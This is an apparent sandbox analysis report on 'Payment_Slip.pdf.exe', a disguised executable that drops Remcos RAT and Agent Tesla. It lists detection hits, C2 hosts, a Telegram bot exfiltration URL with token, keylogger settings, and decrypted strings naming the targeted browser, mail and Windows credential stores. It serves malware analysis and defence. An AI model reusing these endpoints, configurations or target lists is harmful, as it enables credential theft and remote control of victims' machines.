Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", ProcessId: 7200, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ProcessId: 7544, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T17:06:12.938453+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49720	103.186.117.228	9373	TCP
2025-03-15T17:06:15.079073+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49721	103.186.117.228	9373	TCP
2025-03-15T17:06:15.094713+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49723	103.186.117.228	9373	TCP
2025-03-15T17:06:15.104722+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49724	103.186.117.228	9373	TCP
2025-03-15T17:06:15.125955+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49722	103.186.117.228	9373	TCP
2025-03-15T17:06:15.141592+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49725	103.186.117.228	9373	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T17:06:21.563582+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49733	149.154.167.220	443	TCP
2025-03-15T17:06:43.564030+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49743	149.154.167.220	443	TCP
2025-03-15T17:08:09.380755+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49753	149.154.167.220	443	TCP
2025-03-15T17:09:04.422073+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49762	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T17:06:21.563582+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49733	149.154.167.220	443	TCP
2025-03-15T17:06:22.804583+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49735	149.154.167.220	443	TCP
2025-03-15T17:06:43.564030+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49743	149.154.167.220	443	TCP
2025-03-15T17:06:44.775521+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49744	149.154.167.220	443	TCP
2025-03-15T17:06:59.608734+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49749	149.154.167.220	443	TCP
2025-03-15T17:08:09.248035+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49754	149.154.167.220	443	TCP
2025-03-15T17:08:09.380755+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49753	149.154.167.220	443	TCP
2025-03-15T17:08:19.385055+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49755	149.154.167.220	443	TCP
2025-03-15T17:08:26.141853+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49757	149.154.167.220	443	TCP
2025-03-15T17:08:45.831676+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49759	149.154.167.220	443	TCP
2025-03-15T17:08:47.708090+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49761	149.154.167.220	443	TCP
2025-03-15T17:09:04.128726+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49763	149.154.167.220	443	TCP
2025-03-15T17:09:04.422073+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49762	149.154.167.220	443	TCP
2025-03-15T17:09:31.210081+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49764	149.154.167.220	443	TCP
2025-03-15T17:10:01.964448+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49765	149.154.167.220	443	TCP
2025-03-15T17:10:24.624770+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49767	149.154.167.220	443	TCP
2025-03-15T17:10:24.667128+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49769	149.154.167.220	443	TCP
2025-03-15T17:10:24.930905+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49771	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T17:06:14.852680+0100	2803304	3	Unknown Traffic	192.168.2.4	49726	178.237.33.50	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T17:06:21.393517+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49733	149.154.167.220	443	TCP
2025-03-15T17:06:22.552864+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49735	149.154.167.220	443	TCP
2025-03-15T17:06:43.393252+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49743	149.154.167.220	443	TCP
2025-03-15T17:06:44.526096+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49744	149.154.167.220	443	TCP
2025-03-15T17:06:59.352727+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49749	149.154.167.220	443	TCP
2025-03-15T17:08:09.202013+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49753	149.154.167.220	443	TCP
2025-03-15T17:08:09.246002+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49754	149.154.167.220	443	TCP
2025-03-15T17:08:19.384216+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49755	149.154.167.220	443	TCP
2025-03-15T17:08:26.140935+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49757	149.154.167.220	443	TCP
2025-03-15T17:08:45.824418+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49759	149.154.167.220	443	TCP
2025-03-15T17:08:47.705370+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49761	149.154.167.220	443	TCP
2025-03-15T17:09:04.121542+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49762	149.154.167.220	443	TCP
2025-03-15T17:09:04.127924+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49763	149.154.167.220	443	TCP
2025-03-15T17:09:31.205547+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49764	149.154.167.220	443	TCP
2025-03-15T17:10:01.963032+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49765	149.154.167.220	443	TCP
2025-03-15T17:10:24.616571+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49767	149.154.167.220	443	TCP
2025-03-15T17:10:24.661084+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49769	149.154.167.220	443	TCP
2025-03-15T17:10:24.930360+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49771	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Avira: detection malicious, Label: TR/Spy.Gen8

Found malware configuration

Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: 12.0.host.exe.240000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}
Source: host.exe.4860.12.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\host.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: Payment_Slip.pdf.exe	Virustotal: Detection: 45%			Perma Link
Source: Payment_Slip.pdf.exe	ReversingLabs: Detection: 50%

Yara detected Remcos RAT

Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 12.0.host.exe.240000.0.unpack	String decryptor: /log.tmp
Source: 12.0.host.exe.240000.0.unpack	String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack	String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>[
Source: 12.0.host.exe.240000.0.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ]<br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: text/html
Source: 12.0.host.exe.240000.0.unpack	String decryptor: application/zip
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Time:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>User Name:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>Computer Name:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>OSFullName:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>CPU:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>RAM:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: New
Source: 12.0.host.exe.240000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IP Address:
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: https://api.ipify.org
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: false
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: false
Source: 12.0.host.exe.240000.0.unpack	String decryptor: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 5559571239
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack	String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack	String decryptor: mykksg.exe
Source: 12.0.host.exe.240000.0.unpack	String decryptor: mykksg
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: false
Source: 12.0.host.exe.240000.0.unpack	String decryptor: true
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Type
Source: 12.0.host.exe.240000.0.unpack	String decryptor: XCrOSR
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <b>[
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ]</b> (
Source: 12.0.host.exe.240000.0.unpack	String decryptor: )<br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {BACK}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {ALT+TAB}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {ALT+F4}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {TAB}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {ESC}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {Win}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {CAPSLOCK}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {KEYUP}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {KEYDOWN}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {KEYLEFT}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {KEYRIGHT}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {DEL}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {END}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {HOME}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {Insert}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {NumLock}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {PageDown}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {PageUp}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {ENTER}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F1}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F2}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F3}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F4}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F5}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F6}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F7}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F8}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F9}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F10}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F11}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {F12}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: control
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {CTRL}
Source: 12.0.host.exe.240000.0.unpack	String decryptor: &
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <
Source: 12.0.host.exe.240000.0.unpack	String decryptor: >
Source: 12.0.host.exe.240000.0.unpack	String decryptor: "
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <hr>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: logins
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Secure Note
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Web Password Credential
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Credential Picker Protector
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Web Credentials
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Credentials
Source: 12.0.host.exe.240000.0.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Domain Certificate Credential
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Domain Password Credential
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Windows Extended Credential
Source: 12.0.host.exe.240000.0.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack	String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IE/Edge
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UC Browser
Source: 12.0.host.exe.240000.0.unpack	String decryptor: UCBrowser\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Login Data
Source: 12.0.host.exe.240000.0.unpack	String decryptor: journal
Source: 12.0.host.exe.240000.0.unpack	String decryptor: wow_logins
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Safari for Windows
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <array>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <dict>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <string>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </string>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: <data>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: </data>
Source: 12.0.host.exe.240000.0.unpack	String decryptor: -convert xml1 -s -o "
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \fixed_keychain.xml"
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Microsoft\Protect\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: credential
Source: 12.0.host.exe.240000.0.unpack	String decryptor: QQ Browser
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Default\EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Profile
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \EncryptedStorage
Source: 12.0.host.exe.240000.0.unpack	String decryptor: entries
Source: 12.0.host.exe.240000.0.unpack	String decryptor: category
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: str3
Source: 12.0.host.exe.240000.0.unpack	String decryptor: str2
Source: 12.0.host.exe.240000.0.unpack	String decryptor: blob0
Source: 12.0.host.exe.240000.0.unpack	String decryptor: password_value
Source: 12.0.host.exe.240000.0.unpack	String decryptor: IncrediMail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Accounts_New
Source: 12.0.host.exe.240000.0.unpack	String decryptor: PopPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SmtpPassword
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SmtpServer
Source: 12.0.host.exe.240000.0.unpack	String decryptor: EmailAddress
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Eudora
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: current
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack	String decryptor: SavePasswordText
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Settings
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ReturnAddress
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Falkon Browser
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \falkon\profiles\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: profiles.ini
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \browsedata.db
Source: 12.0.host.exe.240000.0.unpack	String decryptor: autofill
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ClawsMail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Claws-mail
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \clawsrc
Source: 12.0.host.exe.240000.0.unpack	String decryptor: passkey0
Source: 12.0.host.exe.240000.0.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \accountrc
Source: 12.0.host.exe.240000.0.unpack	String decryptor: smtp_server
Source: 12.0.host.exe.240000.0.unpack	String decryptor: address
Source: 12.0.host.exe.240000.0.unpack	String decryptor: account
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \passwordstorerc
Source: 12.0.host.exe.240000.0.unpack	String decryptor: {(.),(.)}(.*)
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Flock Browser
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Flock\Browser\
Source: 12.0.host.exe.240000.0.unpack	String decryptor: signons3.txt
Source: 12.0.host.exe.240000.0.unpack	String decryptor: DynDns
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 12.0.host.exe.240000.0.unpack	String decryptor: username=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: password=
Source: 12.0.host.exe.240000.0.unpack	String decryptor: https://account.dyn.com/
Source: 12.0.host.exe.240000.0.unpack	String decryptor: t6KzXhCh
Source: 12.0.host.exe.240000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 12.0.host.exe.240000.0.unpack	String decryptor: global
Source: 12.0.host.exe.240000.0.unpack	String decryptor: accounts
Source: 12.0.host.exe.240000.0.unpack	String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack	String decryptor: username
Source: 12.0.host.exe.240000.0.unpack	String decryptor: account.
Source: 12.0.host.exe.240000.0.unpack	String decryptor: password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack	String decryptor: name
Source: 12.0.host.exe.240000.0.unpack	String decryptor: password
Source: 12.0.host.exe.240000.0.unpack	String decryptor: Psi/Psi+
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Psi\profiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \Psi+\profiles
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack	String decryptor: \accounts.xml
Source: 12.0.host.exe.240000.0.unpack	String decryptor: OpenVPN
